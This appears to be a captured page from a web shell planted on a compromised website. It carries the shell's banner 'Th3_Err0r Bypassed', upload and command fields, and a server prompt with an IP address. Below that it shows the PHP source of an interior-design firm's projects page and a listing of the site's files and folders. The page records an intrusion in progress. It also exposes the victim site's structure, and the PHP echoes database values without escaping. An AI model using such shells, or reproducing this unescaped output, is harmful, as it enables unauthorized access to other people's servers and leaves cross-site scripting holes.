[ Th3_Err0r Bypassed ]




Upload:

Command:

liwaavux@216.73.217.165: ~ $
<?php 
ob_start();
session_start();
$pageTitle  = 'Alliwan | Projects';
include 'init.php';
?>

<div class="nohead"></div>




<section class="site-section" id="blog-section">
  <div class="container">
    <div class="row mb-5">
      <div class="col-12 text-center" data-aos="fade">
        <h2 class="section-title mb-3">All Projects</h2>
      </div>
    </div>
<!--
    <div class="row justify-content-center mb-5">
      <div id="filters" class="filters text-center button-group col-md-12">
        <button class="btn btn-primary active" data-filter="*">All</button>
        <button class="btn btn-primary" data-filter=".interior">interior Design</button>
        <button class="btn btn-primary" data-filter=".Exterior">Exterior Design</button>
        <button class="btn btn-primary" data-filter=".offices">office Design</button>
        <button class="btn btn-primary" data-filter=".villa">Villa Design</button>
        <button class="btn btn-primary" data-filter=".landscape">landscape</button>
        <button class="btn btn-primary" data-filter=".Execution">Design & Execution</button>
      </div>
    </div>  
-->
    <div id="posts" class="row no-gutter">
      <?php 
      foreach (getenproj() as $key ) {
      ?>
      <div  class="item 
        <?php
        if ($key['type'] == 1) {
            echo 'interior';
        }elseif ($key['type'] == 2) {
            echo 'Exterior';
        }elseif ($key['type'] == 3) {
            echo 'offices';
        }elseif ($key['type'] == 4) {
            echo 'landscape';
        }elseif ($key['type'] == 5) {
            echo 'villa';
        }elseif ($key['type'] == 6) {
            echo 'Execution';
        }
        ?>
        col-md-6 col-lg-4 mb-4 mb-lg-4" data-aos="fade-up" data-aos-delay="">
        <div class="h-entry text-center" >
          <a href="details.php?projectcode=<?php echo $key['code']; ?>">
            <img style="height: 220px;width: 100%" src="admin/images/uploads/projects/<?php echo $key['img1'];?>" alt="Image" class="img-fluid">
          </a>
          <h2 class="font-size-regular"><a href="details.php?projectcode=<?php echo $key['code']; ?>"><?php echo $key['tittle']?></a></h2>
          <div class="meta mb-4"><?php echo $key['compname'] ?><span class="mx-2">&bullet;</span> <?php echo $key['donedate'] ?></div>
          <hr>
          <p class="mypr_desc"><?php echo substr($key['description'], 0, 60) . "..."?></p>
          <hr>
          <p><a href="details.php?projectcode=<?php echo $key['code']; ?>" class="btn btn-primary m-auto text-center my-2 mb-2">view Project</a></p>
        </div> 
      </div>
      <?php }?>
    </div>
  </div>
</section>

<?php
include $tpl . 'footer.php';
ob_end_flush();
?>

Filemanager

Name Type Size Permission Actions
.well-known Folder 0755
admin Folder 0755
ar Folder 0755
cgi-bin Folder 0755
css Folder 0755
fonts Folder 0755
images Folder 0755
img Folder 0755
includes Folder 0755
js Folder 0755
set Folder 0755
aboutus.php File 13.61 KB 0644
add_consultation.php File 2.94 KB 0644
amp.php File 26.25 KB 0644
contact.php File 3.96 KB 0644
costresult.php File 13.62 KB 0644
costscalc.php File 42.66 KB 0644
costscalc2.php File 42.68 KB 0644
customer_special.php File 17.66 KB 0644
details.php File 6.1 KB 0644
error_log File 63.37 KB 0644
favicon.jpg File 604 B 0644
googleb1aa3c3470ce80fb (16).html File 53 B 0644
googleb1aa3c3470ce80fb.html File 53 B 0644
googlef3aa636d4a99ee0b.html File 53 B 0644
index.php File 20.92 KB 0644
init.php File 560 B 0644
liwan2023.zip File 10.56 MB 0644
projects.php File 2.72 KB 0644
ret.php File 2.9 KB 0644
robots.txt File 65 B 0644
services.php File 8.58 KB 0644
sitemap.xml File 491 B 0644